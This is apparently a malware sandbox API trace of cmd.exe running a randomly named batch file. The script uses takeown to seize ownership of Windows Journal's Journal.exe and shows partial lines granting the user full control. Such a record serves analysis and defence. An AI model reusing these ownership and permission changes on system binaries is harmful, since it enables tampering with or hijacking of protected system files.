[0277.895] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0277.895] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0277.895] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0277.895] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0277.895] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0277.895] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0277.895] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0277.895] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0277.895] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0277.895] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0277.895] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0277.895] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0277.895] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0277.895] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0277.895] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0277.895] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0277.895] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0277.895] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0277.895] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0277.895] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0277.895] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0277.895] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0277.895] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0277.895] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0277.895] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0277.895] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0277.895] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0277.895] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0277.895] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0277.895] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0277.895] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0277.895] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0277.895] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0277.895] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0277.895] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0277.895] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0277.895] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0277.895] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0277.895] _wcsicmp (_String1="takeown", _String2="FOR") returned 14 [0277.895] _wcsicmp (_String1="takeown", _String2="IF") returned 11 [0277.895] _wcsicmp (_String1="takeown", _String2="REM") returned 2 [0277.895] _wcsnicmp (_String1="take", _String2="cmd ", _MaxCount=0x4) returned 17 [0277.896] SetErrorMode (uMode=0x0) returned 0x0 [0277.896] SetErrorMode (uMode=0x1) returned 0x0 [0277.896] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd1ce40, lpFilePart=0xbbe8c4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xbbe8c4*="Desktop") returned 0x1d [0277.896] SetErrorMode (uMode=0x0) returned 0x1 [0277.896] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0277.896] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0277.896] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0277.896] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0277.896] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xbbe650, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbbe650) returned 0xffffffff [0277.896] GetLastError () returned 0x2 [0277.896] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0277.896] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xbbe650, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbbe650) returned 0xffffffff [0277.896] GetLastError () returned 0x2 [0277.896] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0277.897] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xbbe650, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbbe650) returned 0xd1d1e0 [0277.897] FindClose (in: hFindFile=0xd1d1e0 | out: hFindFile=0xd1d1e0) returned 1 [0277.897] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0xbbe650, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbbe650) returned 0xffffffff [0277.897] GetLastError () returned 0x2 [0277.897] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0xbbe650, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbbe650) returned 0xd1d1e0 [0277.897] FindClose (in: hFindFile=0xd1d1e0 | out: hFindFile=0xd1d1e0) returned 1 [0277.897] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0277.897] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0277.897] GetConsoleTitleW (in: lpConsoleTitle=0xbbeb44, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0277.897] InitializeProcThreadAttributeList (in: lpAttributeList=0xbbea70, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xbbea54 | out: lpAttributeList=0xbbea70, lpSize=0xbbea54) returned 1 [0277.897] UpdateProcThreadAttribute (in: lpAttributeList=0xbbea70, dwFlags=0x0, Attribute=0x60001, lpValue=0xbbea5c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xbbea70, lpPreviousValue=0x0) returned 1 [0277.897] GetStartupInfoW (in: lpStartupInfo=0xbbeaa8 | out: lpStartupInfo=0xbbeaa8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0277.897] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0277.898] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0277.898] lstrcmpW (lpString1="\\takeown.exe", lpString2="\\XCOPY.EXE") returned -1 [0277.898] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\takeown.exe", lpCommandLine="takeown /F \"C:\\Program Files\\Windows Journal\\Journal.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0xbbe9f8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="takeown /F \"C:\\Program Files\\Windows Journal\\Journal.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xbbea44 | out: lpCommandLine="takeown /F \"C:\\Program Files\\Windows Journal\\Journal.exe\"", lpProcessInformation=0xbbea44*(hProcess=0xb0, hThread=0xb8, dwProcessId=0x71c, dwThreadId=0x5b0)) returned 1 [0277.906] CloseHandle (hObject=0xb8) returned 1 [0277.906] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0277.906] GetEnvironmentStringsW () returned 0xd1b2e8* [0277.906] FreeEnvironmentStringsA (penv="=") returned 1 [0277.906] WaitForSingleObject (hHandle=0xb0, dwMilliseconds=0xffffffff) returned 0x0 [0282.491] GetExitCodeProcess (in: hProcess=0xb0, lpExitCode=0xbbe9dc | out: lpExitCode=0xbbe9dc*=0x0) returned 1 [0282.492] CloseHandle (hObject=0xb0) returned 1 [0282.492] _vsnwprintf (in: _Buffer=0xbbeac4, _BufferCount=0x13, _Format="%08X", _ArgList=0xbbe9e4 | out: _Buffer="00000000") returned 8 [0282.492] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0282.492] GetEnvironmentStringsW () returned 0xd1b2e8* [0282.492] FreeEnvironmentStringsA (penv="=") returned 1 [0282.492] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0282.492] GetEnvironmentStringsW () returned 0xd1b2e8* [0282.492] FreeEnvironmentStringsA (penv="=") returned 1 [0282.492] DeleteProcThreadAttributeList (in: lpAttributeList=0xbbea70 | out: lpAttributeList=0xbbea70) [0282.492] _get_osfhandle (_FileHandle=1) returned 0x3c [0282.492] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0282.658] _get_osfhandle (_FileHandle=1) returned 0x3c [0282.658] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0282.658] _get_osfhandle (_FileHandle=0) returned 0x38 [0282.658] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0282.658] SetConsoleInputExeNameW () returned 0x1 [0282.658] GetConsoleOutputCP () returned 0x1b5 [0282.658] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0282.658] SetThreadUILanguage (LangId=0x0) returned 0x409 [0282.659] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xbbf204, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0282.659] _open_osfhandle (_OSFileHandle=0xb0, _Flags=8) returned 3 [0282.659] _get_osfhandle (_FileHandle=3) returned 0xb0 [0282.659] SetFilePointer (in: hFile=0xb0, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0282.659] _get_osfhandle (_FileHandle=3) returned 0xb0 [0282.659] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0282.659] ReadFile (in: hFile=0xb0, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xbbf1d4, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xbbf1d4*=0xb3, lpOverlapped=0x0) returned 1 [0282.659] SetFilePointer (in: hFile=0xb0, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0282.660] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=16, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="set FN=\"%~nx1\"\r\nUSERNAME%:F /C\r\n") returned 16 [0282.660] _get_osfhandle (_FileHandle=3) returned 0xb0 [0282.660] GetFileType (hFile=0xb0) returned 0x1 [0282.660] _get_osfhandle (_FileHandle=3) returned 0xb0 [0282.660] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0282.660] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\Journal.exe", nBufferLength=0x208, lpBuffer=0xbbe950, lpFilePart=0xbbe914 | out: lpBuffer="C:\\Program Files\\Windows Journal\\Journal.exe", lpFilePart=0xbbe914*="Journal.exe") returned 0x2c [0282.660] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0xbbe658 | out: lpFindFileData=0xbbe658) returned 0xd1ca60 [0282.660] FindClose (in: hFindFile=0xd1ca60 | out: hFindFile=0xd1ca60) returned 1 [0282.660] _wcsnicmp (_String1="PROGRA~1", _String2="Program Files", _MaxCount=0xd) returned 17 [0282.660] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal", lpFindFileData=0xbbe658 | out: lpFindFileData=0xbbe658) returned 0xd1ca60 [0282.660] FindClose (in: hFindFile=0xd1ca60 | out: hFindFile=0xd1ca60) returned 1 [0282.660] _wcsnicmp (_String1="WIA843~1", _String2="Windows Journal", _MaxCount=0xf) returned -13 [0282.660] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal\\Journal.exe", lpFindFileData=0xbbe658 | out: lpFindFileData=0xbbe658) returned 0xd1ca60 [0282.660] FindClose (in: hFindFile=0xd1ca60 | out: hFindFile=0xd1ca60) returned 1 [0282.661] _wcsicmp (_String1="set", _String2=")") returned 74 [0282.661] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0282.661] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0282.661] _wcsicmp (_String1="IF", _String2="set") returned -10 [0282.661] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0282.661] _wcsicmp (_String1="REM", _String2="set") returned -1 [0282.661] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0282.661] _tell (_FileHandle=3) returned 63 [0282.661] _close (_FileHandle=3) returned 0 [0282.661] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xbbef98 | out: _Buffer="\r\n") returned 2 [0282.661] _get_osfhandle (_FileHandle=1) returned 0x3c [0282.661] GetFileType (hFile=0x3c) returned 0x2 [0282.661] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0282.661] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbef70 | out: lpMode=0xbbef70) returned 1 [0282.662] _get_osfhandle (_FileHandle=1) returned 0x3c [0282.662] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xbbef88, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xbbef88*=0x2) returned 1 [0282.662] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0282.662] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0282.662] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0xbbef94 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0282.662] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0xbbef94 | out: _Buffer=">") returned 1 [0282.662] _get_osfhandle (_FileHandle=1) returned 0x3c [0282.662] GetFileType (hFile=0x3c) returned 0x2 [0282.662] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0282.662] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbef74 | out: lpMode=0xbbef74) returned 1 [0282.682] _get_osfhandle (_FileHandle=1) returned 0x3c [0282.682] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xbbef8c, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0xbbef8c*=0x1e) returned 1 [0283.064] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.064] GetFileType (hFile=0x3c) returned 0x2 [0283.064] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0283.064] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbf214 | out: lpMode=0xbbf214) returned 1 [0283.153] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.153] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xd282a0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xbbf22c, lpReserved=0x0 | out: lpBuffer=0xd282a0*, lpNumberOfCharsWritten=0xbbf22c*=0x3) returned 1 [0283.208] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xbbf234 | out: _Buffer=" FN=\"Journal.exe\" ") returned 18 [0283.208] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.208] GetFileType (hFile=0x3c) returned 0x2 [0283.208] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0283.208] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbf20c | out: lpMode=0xbbf20c) returned 1 [0283.280] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.280] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x12, lpNumberOfCharsWritten=0xbbf224, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xbbf224*=0x12) returned 1 [0283.455] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xbbf248 | out: _Buffer="\r\n") returned 2 [0283.455] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.455] GetFileType (hFile=0x3c) returned 0x2 [0283.455] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0283.455] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbf220 | out: lpMode=0xbbf220) returned 1 [0283.765] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.765] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xbbf238, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xbbf238*=0x2) returned 1 [0283.965] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0283.965] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0283.965] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0283.965] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0283.965] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0283.965] _wcsicmp (_String1="set", _String2="CD") returned 16 [0283.965] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0283.965] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0283.965] _wcsicmp (_String1="set", _String2="REN") returned 1 [0283.965] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0283.965] _wcsicmp (_String1="set", _String2="SET") returned 0 [0283.965] GetConsoleTitleW (in: lpConsoleTitle=0xbbedb8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0284.251] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0284.251] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0284.251] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0284.251] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0284.251] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0284.251] _wcsicmp (_String1="set", _String2="CD") returned 16 [0284.251] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0284.251] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0284.251] _wcsicmp (_String1="set", _String2="REN") returned 1 [0284.251] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0284.251] _wcsicmp (_String1="set", _String2="SET") returned 0 [0284.251] wcsncmp (_String1="FN", _String2="/", _MaxCount=0x4) returned 23 [0284.251] _wcsnicmp (_String1="FN", _String2="/A", _MaxCount=0x2) returned 55 [0284.251] _wcsnicmp (_String1="FN", _String2="/P", _MaxCount=0x2) returned 55 [0284.251] SetEnvironmentVariableW (lpName="FN", lpValue="\"Journal.exe\"") returned 1 [0284.251] GetEnvironmentStringsW () returned 0xd1b2e8* [0284.251] FreeEnvironmentStringsA (penv="=") returned 1 [0284.251] _get_osfhandle (_FileHandle=1) returned 0x3c [0284.251] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0284.284] _get_osfhandle (_FileHandle=1) returned 0x3c [0284.284] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0284.325] _get_osfhandle (_FileHandle=0) returned 0x38 [0284.325] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0284.767] SetConsoleInputExeNameW () returned 0x1 [0284.768] GetConsoleOutputCP () returned 0x1b5 [0284.869] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0284.869] SetThreadUILanguage (LangId=0x0) returned 0x409 [0284.924] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xbbf204, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0284.925] _open_osfhandle (_OSFileHandle=0xb0, _Flags=8) returned 3 [0284.925] _get_osfhandle (_FileHandle=3) returned 0xb0 [0284.925] SetFilePointer (in: hFile=0xb0, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0284.925] _get_osfhandle (_FileHandle=3) returned 0xb0 [0284.925] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0284.925] ReadFile (in: hFile=0xb0, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xbbf1d4, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xbbf1d4*=0xa3, lpOverlapped=0x0) returned 1 [0284.925] SetFilePointer (in: hFile=0xb0, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0284.925] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=15, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="cd /d \"%~dp0\"\r\n\nUSERNAME%:F /C\r\n") returned 15 [0284.926] _get_osfhandle (_FileHandle=3) returned 0xb0 [0284.926] GetFileType (hFile=0xb0) returned 0x1 [0284.926] _get_osfhandle (_FileHandle=3) returned 0xb0 [0284.926] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0284.926] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", nBufferLength=0x208, lpBuffer=0xbbe950, lpFilePart=0xbbe914 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", lpFilePart=0xbbe914*="vRnqNMBW.bat") returned 0x2a [0284.926] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xbbe658 | out: lpFindFileData=0xbbe658) returned 0xd1ca58 [0284.926] FindClose (in: hFindFile=0xd1ca58 | out: hFindFile=0xd1ca58) returned 1 [0284.926] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0xbbe658 | out: lpFindFileData=0xbbe658) returned 0xd1ca58 [0284.926] FindClose (in: hFindFile=0xd1ca58 | out: hFindFile=0xd1ca58) returned 1 [0284.926] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0284.926] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0xbbe658 | out: lpFindFileData=0xbbe658) returned 0xd1ca58 [0284.926] FindClose (in: hFindFile=0xd1ca58 | out: hFindFile=0xd1ca58) returned 1 [0284.926] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", lpFindFileData=0xbbe658 | out: lpFindFileData=0xbbe658) returned 0xd1ca58 